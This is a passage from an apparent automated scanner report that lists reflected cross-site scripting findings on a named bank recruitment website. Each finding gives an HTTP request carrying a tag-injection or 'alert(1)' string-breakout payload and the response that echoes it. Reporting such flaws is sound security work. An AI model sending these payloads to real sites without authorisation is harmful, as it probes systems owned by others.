Path:   /acti_support.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf7de"><a>f1c96294668 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /acti_support.php?bf7de"><a>f1c96294668=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:27 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:27 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Support
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/acti_support.php?bf7de"><a>f1c96294668=1" />
...[SNIP]...

1.26. http://www.mycreditagricole.jobs/activities_careers.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /activities_careers.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc9a2"><a>c7afa9ee159 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /activities_careers.php?dc9a2"><a>c7afa9ee159=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:24 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:24 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 60184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Activit
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/activities_careers.php?dc9a2"><a>c7afa9ee159=1" />
...[SNIP]...

1.27. http://www.mycreditagricole.jobs/activities_careers.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /activities_careers.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25941"-alert(1)-"9f171d652dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /activities_careers.php?25941"-alert(1)-"9f171d652dd=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:50 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:50 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 60205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Activit
...[SNIP]...
Agricole Recruitment Group";
var SharingBaseTitle = "Activities and careers - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/activities_careers.php?25941"-alert(1)-"9f171d652dd=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.28. http://www.mycreditagricole.jobs/apply.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /apply.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce76d"><a>629914ffb41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /apply.php?ce76d"><a>629914ffb41=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:24 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:24 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Apply -
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/apply.php?ce76d"><a>629914ffb41=1" />
...[SNIP]...

1.29. http://www.mycreditagricole.jobs/apply.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /apply.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a501"-alert(1)-"552fb4142e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apply.php?2a501"-alert(1)-"552fb4142e0=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:43 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:43 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Apply -
...[SNIP]...
aringTitle = "Apply - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "Apply - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/apply.php?2a501"-alert(1)-"552fb4142e0=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.30. http://www.mycreditagricole.jobs/cagroup.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /cagroup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ec44"><a>73fdf4dc79d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cagroup.php?1ec44"><a>73fdf4dc79d=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Proxy-Connection: keep-alive
Referer: http://www.credit-agricole.com/en/Sustainable-development/Acting-for-the-environment/Reducing-our-CO2-emissions-and-energy-consumption
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:01:42 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:01:42 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Content-Length: 52993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>About u
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/cagroup.php?1ec44"><a>73fdf4dc79d=1" />
...[SNIP]...

1.31. http://www.mycreditagricole.jobs/cagroup.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /cagroup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2e53"-alert(1)-"ec12183efc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cagroup.php?c2e53"-alert(1)-"ec12183efc3=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Proxy-Connection: keep-alive
Referer: http://www.credit-agricole.com/en/Sustainable-development/Acting-for-the-environment/Reducing-our-CO2-emissions-and-energy-consumption
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:02:01 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:02:01 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Content-Length: 53014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>About u
...[SNIP]...
le = "About us - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "About us - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/cagroup.php?c2e53"-alert(1)-"ec12183efc3=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.32. http://www.mycreditagricole.jobs/cagroup_activities.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /cagroup_activities.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7a68"-alert(1)-"592c2cce0a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cagroup_activities.php?a7a68"-alert(1)-"592c2cce0a0=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:54 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:54 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 55083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Our act
...[SNIP]...
icole Recruitment Group";
var SharingBaseTitle = "Our activities - About us - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/cagroup_activities.php?a7a68"-alert(1)-"592c2cce0a0=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.33. http://www.mycreditagricole.jobs/cagroup_activities.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /cagroup_activities.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38c44"><a>b3a352f3f49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cagroup_activities.php?38c44"><a>b3a352f3f49=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:28 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:28 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 55062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Our act
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/cagroup_activities.php?38c44"><a>b3a352f3f49=1" />
...[SNIP]...

1.34. http://www.mycreditagricole.jobs/cagroup_key_figures.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /cagroup_key_figures.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dcde"><a>74495033bc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cagroup_key_figures.php?5dcde"><a>74495033bc1=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:23 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:23 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52119

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Our key
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/cagroup_key_figures.php?5dcde"><a>74495033bc1=1" />
...[SNIP]...

1.35. http://www.mycreditagricole.jobs/cagroup_key_figures.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /cagroup_key_figures.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cd39"-alert(1)-"692f3c577f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cagroup_key_figures.php?9cd39"-alert(1)-"692f3c577f1=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:42 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:42 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Our key
...[SNIP]...
ole Recruitment Group";
var SharingBaseTitle = "Our key figures - About us - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/cagroup_key_figures.php?9cd39"-alert(1)-"692f3c577f1=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.36. http://www.mycreditagricole.jobs/cagroup_locations.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /cagroup_locations.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 299aa"><a>16646a432e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cagroup_locations.php?299aa"><a>16646a432e=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:22 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:22 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 51421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Our loc
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/cagroup_locations.php?299aa"><a>16646a432e=1" />
...[SNIP]...

1.37. http://www.mycreditagricole.jobs/cagroup_locations.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /cagroup_locations.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e26e8"-alert(1)-"9ea15a6e686 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cagroup_locations.php?e26e8"-alert(1)-"9ea15a6e686=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:41 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:41 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 51445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Our loc
...[SNIP]...
gricole Recruitment Group";
var SharingBaseTitle = "Our locations - About us - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/cagroup_locations.php?e26e8"-alert(1)-"9ea15a6e686=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.38. http://www.mycreditagricole.jobs/divers_disab_events.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /divers_disab_events.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d84b0"-alert(1)-"f90a72f441e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /divers_disab_events.php?d84b0"-alert(1)-"f90a72f441e=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:53 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:53 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Events
...[SNIP]...
it Agricole Recruitment Group";
var SharingBaseTitle = "Events - Diversity - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/divers_disab_events.php?d84b0"-alert(1)-"f90a72f441e=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.39. http://www.mycreditagricole.jobs/divers_disab_events.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /divers_disab_events.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb446"><a>45c1a10da8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /divers_disab_events.php?bb446"><a>45c1a10da8a=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:30 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:30 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Events
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/divers_disab_events.php?bb446"><a>45c1a10da8a=1" />
...[SNIP]...

1.40. http://www.mycreditagricole.jobs/divers_disability.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /divers_disability.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 751d7"><a>c6825584c86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /divers_disability.php?751d7"><a>c6825584c86=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:30 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
